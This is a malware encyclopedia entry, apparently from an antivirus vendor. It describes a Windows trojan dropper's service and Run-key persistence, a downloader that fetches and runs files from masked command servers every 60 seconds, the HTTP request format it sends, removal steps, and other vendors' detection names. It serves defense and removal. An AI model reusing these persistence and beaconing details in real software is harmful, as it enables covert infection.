Internet threat level: 1
Home→Descriptions→Trojan-Dropper.Win32.Agent.cwsw
Trojan-Dropper.Win32.Agent.cwsw
| Detected | Aug 30 2010 17:57 GMT |
| Released | Aug 31 2010 04:12 GMT |
| Published | Mar 24 2011 10:44 GMT |
Payload
Removal instructions
Technical Details
This Trojan installs other programs on the computer without the user's knowledge. It is a Windows application (PE EXE file). It is 37 376 bytes in size. It is written in C++.
Payload
Once launched, the Trojan carries out the following actions:
- It terminates and deletes the service "COMServer".
- It deletes the following system registry key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run] "COMServer"
- It terminates the process "comsrvr.exe".
- It extracts from itself a file, which is then saved in the system as
%System%\msapps\comsrvr.exe
(29 696 bytes; detected by Kaspersky Anti-Virus as "Trojan-Downloader.Win32.Agent.eljy") - It creates and launches in the system a service named "COMServer", the executable file for which is the previously extracted file.
- If it does not succeed in creating the service, the Trojan creates this system registry key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run] "COMServer" = "%System%\msapps\comsrvr.exe"
This ensures that the file "comsrvr.exe" will be launched automatically each time the system is rebooted. - The extracted file is then launched for execution.
The launched Trojan ("Trojan-Downloader.Win32.Agent.eljy") executes the functionality of a downloader. A connection is established with the following servers:
ccooo***o.cc cccooo***o.ccHTTP requests in the following format are sent to the above-mentioned hosts:
GET favicon.ico HTTP/1.1 Host: bcProxyBot.com Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg Accept-Language: en-us UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.2.2.1) Cookie: 000C29CBBE24<computer name>In response to the request, the server sends a file, which the Trojan saves in the current user's temporary files directory "%Temp%" under a random name. Once downloaded, the file is launched for execution.
File downloading takes place in a cycle every 60 seconds.
Removal instructions
If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:
- Use Task Manager to terminate the process "comsrvr.exe".
- Delete the following system registry key (see What is a system registry and how do I use it?):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run] "COMServer" = "%System%\msapps\comsrvr.exe"
- Delete the system registry branches (see What is a system registry and how do I use it?):
[HKLM\System\ControlSet001\Services\COMServer] [HKLM\System\CurrentControlSet\Services\COMServer]
- Delete the following file:
%System%\msapps\comsrvr.exe
- Delete the original Trojan file (its location will depend on how the program originally penetrated the infected computer).
- Delete the files downloaded by the Trojan in the "%Temp%" directory.
- Empty the Temporary Internet Files directory, which may contain infected files (see How to delete infected files from Temporary Internet Files folder?).
- Perform a full scan of the computer using Kaspersky Anti-Virus with up-to-date antivirus databases (download a trial version).
Trojan-Dropper programs are designed to secretly install malicious programs built into their code to victim computers.
This type of malicious program usually save a range of files to the victim’s drive (usually to the Windows directory, the Windows system directory, temporary directory etc.), and launches them without any notification (or with fake notification of an archive error, an outdated operating system version, etc.).
Such programs are used by hackers to:
- secretly install Trojan programs and/or viruses
- protect known malicious programs from being detected by antivirus solutions; not all antivirus programs are capable of scanning all the components inside this type of Trojans.
Trojan-Dropper.
- Trojan:
Generic. dx!ubd (McAfee) - Mal/Zbot-U (Sophos)
- Trj/StartPage.
DAW (Panda) - Trojan:
Win32/Bumat!rts (MS(OneCare)) - a variant of Win32/TrojanProxy.
Bakcorox. A trojan (Nod32) - Gen:
Trojan. Heur. RP. cuW@a0qJF7di (BitDef7) - Trojan.
DR. Agent. ZDGP (VirusBuster) - Win32:
Malware-gen (AVAST) - Gen.
Trojan (Ikarus) - Proxy.
ALAH (AVG) - TR/Dropper.
Gen (AVIRA) - Trojan.
Gen (NAV) - W32/Smalltroj.
ZJME (Norman) - Trojan.
Win32. Generic. 522CDD9B (Rising) - Trojan-Dropper.
Win32. Agent. cwsw [AVP] (FSecure) - TROJ_LAMEWAR.
VTG (TrendMicro) - Trojan.
Win32. Generic!BT (Sunbelt) - Trojan.
DR. Agent!ST7mDTAl8yE (VirusBusterBeta)
© 1997-2013 Kaspersky Lab ZAO. All Rights Reserved.
Industry-leading Antivirus Software.
Registered trademarks and service marks are the property of their respective owners.
The authors' opinions do not necessarily reflect the official positions of Kaspersky Lab.